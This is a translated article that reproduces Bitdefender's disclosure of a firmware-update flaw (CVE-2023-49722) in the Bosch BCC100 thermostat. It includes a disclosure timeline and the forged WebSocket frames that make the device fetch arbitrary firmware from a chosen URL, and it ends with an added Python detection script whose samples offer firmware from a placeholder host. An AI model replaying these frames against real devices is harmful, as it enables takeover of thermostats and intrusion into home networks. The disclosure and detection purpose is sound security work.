IoT vulnerability: Bitdefender warns about vulnerabilities in the Bosch BCC100 thermostat


Bitdefender today publishes a vulnerability study on the popular Bosch BCC100 thermostat. The vulnerability concerns the Wi-Fi microcontroller that serves as the network gateway for the thermostat’s logic microcontroller (the brain of the device).

Tribune – Through the Wi-Fi microcontroller, an attacker can send commands to the thermostat, including writing a malicious update to the device, which lets them get a foothold on the user’s network in order to observe traffic, pivot to other devices and carry out further malicious activity.

Bosch has patched the vulnerability. However, Bitdefender recommends that users make sure they are running the latest corresponding software.

The key points of the audit (the full analysis by the Bitdefender Lab, in English, is below):

  • A vulnerability was discovered in the popular Bosch BCC100 thermostat. It affects the Wi-Fi microcontroller that serves as the network gateway for the device’s logic controller.
  • This vulnerability lets an attacker send commands to the logic controller, including a malicious update that would allow the attacker to get into the user’s network or simply brick the device.
  • Cybercriminals look for unpatched IoT devices using automated scanning tools.
  • For a business, or even an ordinary user, access to the IoT network should be restricted, with the “internal”, “IoT” and “guest” networks configured separately. All these networks must be isolated from one another. If point-of-sale devices are used, they should be connected via 4G/5G or via a dedicated Wi-Fi or wired network.

Below is the vulnerability analysis by Bitdefender:

Foreword

Several factors underscore the importance of smart thermostats: energy efficiency, environmental sustainability, and the spread of smart home technologies. These devices have a major impact on energy conservation and its associated cost savings, while making homes noticeably more comfortable.

This combination of energy efficiency, convenience and environmental consciousness, which resonates with the current priorities of individuals, governments and societies, has led to the diversification of an ecosystem comprising multiple vendors and technologies.

As the creator of the world’s first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities that might affect customers if left unaddressed. This research article is part of a broader program and aims to shed light on the security of the world’s best-sellers in the IoT space. This report covers the Bosch BCC100 thermostat and reveals vulnerabilities affecting the SW version 1.7.0 – HD Version 4.13.22.

Vulnerability at a glance

[LOCAL] During our security audit, Bitdefender researchers discovered a vulnerability that lets an attacker on the same network replace the device firmware with a rogue version (CVE-2023-49722).

Disclosure timeline

  • Aug 29, 2023: Bitdefender makes first contact with the vulnerable vendor and submits the full report
  • Sep 18, 2023: Bitdefender learns that the issue is still undergoing internal investigation at the vendor
  • Oct 04, 2023: Vulnerability is triaged and confirmed.
  • Oct 30, 2023: Bitdefender asks for an update, and is told the issue is still being handled
  • Nov 11, 2023: Fix deployed in production.
  • Nov 17, 2023: Bitdefender asks for additional info about the update timeline in preparation for coordinated vulnerability disclosure
  • Jan 11, 2024: This report becomes public.

Vulnerability walkthrough

The thermostat has two microcontrollers that work together, as seen in the picture below. The one on the right, in yellow, is a Hi-Flying chip, HF-LPT230, that implements the Wi-Fi functionality. It acts as a network gateway for the logic microcontroller. The STMicroelectronics chip, STM32F103, in red, is the brain of the device and implements the main logic.

The STM chip has no networking capabilities and instead relies on the Wi-Fi chip to communicate with the Internet. It uses the UART protocol to pass data to the Wi-Fi chip, which acts as a gateway/proxy and establishes the actual connection to the servers.

We have discovered that the Wi-Fi chip also listens on TCP port 8899 on the LAN, and will mirror any message received on that port directly to the main microcontroller, through the UART data bus. This means that, if formatted correctly, the microcontroller can’t distinguish malicious messages from genuine ones sent by the cloud server. This allows an attacker to send commands to the thermostat, including writing a malicious update to the device.

Updating the thermostat with arbitrary firmware

The thermostat communicates with the connect.boschconnectedcontrol.com server through JSON-encoded payloads over a WebSocket. The frames sent by the server are unmasked, making them easy to imitate.

First, we send the “device/update” command on port 8899 that lets the device know that there is a new update and to start the update procedure:

\x81\x46{"cmd":"device/update","device_id":"<device mac address>","timestamp":1111111}

This will prompt the thermostat to ask the cloud server for details about the update:

{"cmd":"server/fireware","device_id":"<device mac address>","timestamp":"<unix timestamp>","model":"BCC101","version":"1.7.0","id":"0"}

Even though the server responds with an error code because there is no update available:

{"error_code":"99","cmd":"server/fireware","device_id":"<device mac address>","timestamp":"<unix timestamp>"}

The device will also accept a forged response containing the update details:

\x81\x7e\x01\x33{"error_code":"0","cmd":"server/fireware","device_id":"<device mac>","timestamp":"<unix timestamp>","model":"BCC101","version":"<fw version>","url":"<firmware URL>","size":"<firmware size>","isize":"0","pic_pos":"2930","md5":"<firmware md5>","type":0,"release_date":"1111-11-11"}

This packet contains the URL the firmware will be downloaded from, the size and MD5 checksum of the firmware file, and the version of the new firmware, which must be higher than the current one. There is no mechanism that validates the authenticity of a firmware update: the MD5 only checks integrity, not origin.

If all the conditions match, the thermostat asks the cloud server to download the firmware and send it through the websocket:

{"cmd":"server/deviceUpdate","device_id":"<device mac>","timestamp":"<unix timestamp>","url":"<firmware URL>","pindex":"0"}

The URL must be Internet-accessible, as the cloud server is the component that downloads the file. After the device receives the file, it performs the upgrade. At this point, the device is considered totally compromised.
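As an added defender-side example (not part of Bitdefender’s report or Bosch’s code), the following Python decodes the unmasked WebSocket text frames described above and flags the cloud-only commands when they are seen heading to the thermostat on TCP/8899 from a LAN host rather than from the cloud. The MAC address, version and URL values in the samples are constructed placeholders.

```python
import json
import struct

# Commands the write-up shows being replayed to the thermostat over LAN port 8899;
# legitimately they only ever arrive from connect.boschconnectedcontrol.com.
CLOUD_ONLY_CMDS = {"device/update", "server/fireware", "server/deviceUpdate"}

def parse_unmasked_text_frame(data: bytes) -> bytes:
    """Decode one unmasked RFC 6455 text frame (server->device direction); return payload."""
    if len(data) < 2:
        raise ValueError("frame too short")
    if data[0] & 0x0F != 0x1:
        raise ValueError("not a text frame")
    if data[1] & 0x80:
        raise ValueError("masked frame (only clients mask)")
    length, offset = data[1] & 0x7F, 2
    if length == 126:                       # 16-bit extended length, e.g. \x7e\x01\x33
        (length,), offset = struct.unpack("!H", data[2:4]), 4
    elif length == 127:                     # 64-bit extended length
        (length,), offset = struct.unpack("!Q", data[2:10]), 10
    payload = data[offset:offset + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return payload

def inspect_frame(frame: bytes, from_cloud: bool) -> list:
    """Detection findings for one frame seen heading to the thermostat on TCP/8899."""
    msg = json.loads(parse_unmasked_text_frame(frame).decode())
    cmd = msg.get("cmd")
    findings = []
    if cmd in CLOUD_ONLY_CMDS and not from_cloud:
        findings.append(f"cloud-only command {cmd!r} injected from the LAN")
    # A non-error server/fireware reply is an update offer; the device validates only
    # version/size/md5, never authenticity, so every offer deserves a log entry.
    if cmd == "server/fireware" and msg.get("error_code") == "0":
        findings.append(f"firmware offer: version={msg.get('version')} url={msg.get('url')}")
    return findings

def _frame(payload: bytes) -> bytes:
    """Wrap a payload as in the page's captures (used here only to build test data)."""
    hdr = bytes([len(payload)]) if len(payload) < 126 else b"\x7e" + struct.pack("!H", len(payload))
    return b"\x81" + hdr + payload

# Constructed samples with a placeholder MAC. The first payload is 70 bytes, so its
# length byte is 0x46, matching the \x81\x46 header shown in the write-up.
SAMPLE_UPDATE = _frame(b'{"cmd":"device/update","device_id":"aabbccddeeff","timestamp":1111111}')
SAMPLE_OFFER = _frame(json.dumps({"error_code": "0", "cmd": "server/fireware",
    "device_id": "aabbccddeeff", "version": "9.9.9", "url": "http://fw.example.invalid/fw.bin",
    "size": "1", "md5": "<placeholder>"}).encode())
```

Running the same inspection over frames captured from the cloud side (from_cloud=True) yields no LAN-injection finding, which is what makes the source check useful as a detection rule rather than a blanket alert.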